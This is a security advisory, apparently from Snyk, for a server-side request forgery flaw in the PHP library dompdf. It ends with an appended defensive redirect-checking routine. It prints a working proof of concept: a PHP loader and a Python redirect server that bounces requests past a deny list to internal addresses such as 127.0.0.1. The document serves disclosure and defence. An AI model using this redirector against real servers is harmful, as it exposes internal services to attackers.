Server-side Request Forgery (SSRF) Affecting dompdf/dompdf package, versions <2.0.0
Snyk ID SNYK-PHP-DOMPDFDOMPDF-2936790
- published 29 Jun 2022
- disclosed 29 Jun 2022
- credit haxatron
Introduced: 29 Jun 2022
CVE-2022-0085
How to fix?
Upgrade dompdf/dompdf to version 2.0.0 or higher.
Overview
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF). When DomPDF is used with isRemoteEnabled and allow_url_fopen set to true, and remote IP addresses are restricted via a deny list, an attacker can supply a URL whose host passes the deny list but that serves a 302 redirect response to a restricted IP address; the deny list is checked only against the initial URL, not against the redirect target.
PoC:
poc.php
<?php
// Attacker-controlled URL (placeholder); its host resolves to an IP that is not on the deny list
$url = "http://[ATTACKER-IP]";
require_once 'dompdf/autoload.inc.php';
use Dompdf\Dompdf;
use Dompdf\Options;

$options = new Options();
$options->set('isRemoteEnabled', true);
$dompdf = new Dompdf($options);

// The deny list is applied to the initial URL's host only; redirect targets are never checked
$host = parse_url($url, PHP_URL_HOST);
$ip = gethostbyname($host);
if ($ip !== "127.0.0.1") {
    $dompdf->loadHtmlFile($url); // the remote fetch follows the 302 to the restricted address
    $dompdf->setPaper('A4', 'landscape');
    $dompdf->render();
    $dompdf->stream();
}
?>
redirector.py - hosted on http://[ATTACKER-IP]
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv) - 1 != 2:
    print("Usage: {} <port_number> <url>".format(sys.argv[0]))
    sys.exit()

class Redirect(BaseHTTPRequestHandler):
    # Answer every GET with a 302 whose Location is the URL given on the command line
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', sys.argv[2])
        self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
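A defender-side check, added here as an example and not part of the advisory or of dompdf's own code: it validates the resolved address of every redirect hop instead of only the initial URL, so the 302 chain used by the PoC is refused. The stand-in HTTP client and DNS map are constructed for offline use; the hostnames and addresses in them are placeholders.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse
MAX_REDIRECTS = 5

def is_blocked_ip(ip_str):
    """Deny loopback, private (RFC 1918), link-local, multicast, reserved and unspecified."""
    ip = ipaddress.ip_address(ip_str)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def validate_url(url, resolve=socket.gethostbyname):
    """Resolve the URL's host and raise ValueError if it points at a blocked address."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("unsupported URL: %s" % url)
    try:
        ip = str(ipaddress.ip_address(parts.hostname))  # IP literal, no lookup needed
    except ValueError:
        ip = resolve(parts.hostname)
    if is_blocked_ip(ip):
        raise ValueError("%s resolves to blocked address %s" % (parts.hostname, ip))
    return ip  # a real client should also connect to this IP rather than re-resolve (rebinding)

def fetch_checked(url, fetch_once, resolve=socket.gethostbyname):
    """Fetch url, re-validating the target of every redirect hop. fetch_once(url) must issue
    ONE request without following redirects and return (status, location_or_None, body).
    Checking only the first URL, as the PoC above does, lets a 302 carry the request through."""
    for _ in range(MAX_REDIRECTS + 1):
        validate_url(url, resolve)
        status, location, body = fetch_once(url)
        if status in (301, 302, 303, 307, 308) and location:
            url = urljoin(url, location)  # relative Location values are resolved too
            continue
        return body
    raise ValueError("too many redirects")

# Constructed offline scenario mirroring the advisory; no real network is used.
CONSTRUCTED_DNS = {"attacker.example": "8.8.8.8", "public.example": "1.1.1.1"}
def constructed_fetch(url):
    """Stand-in HTTP client: the attacker host answers with a 302 to loopback."""
    if urlparse(url).hostname == "attacker.example":
        return 302, "http://127.0.0.1/internal", b""
    return 200, None, b"page"
def run_scenario(url="http://attacker.example/"):
    try:
        return fetch_checked(url, constructed_fetch, lambda h: CONSTRUCTED_DNS.get(h, h))
    except ValueError as exc:
        return "blocked: %s" % exc
```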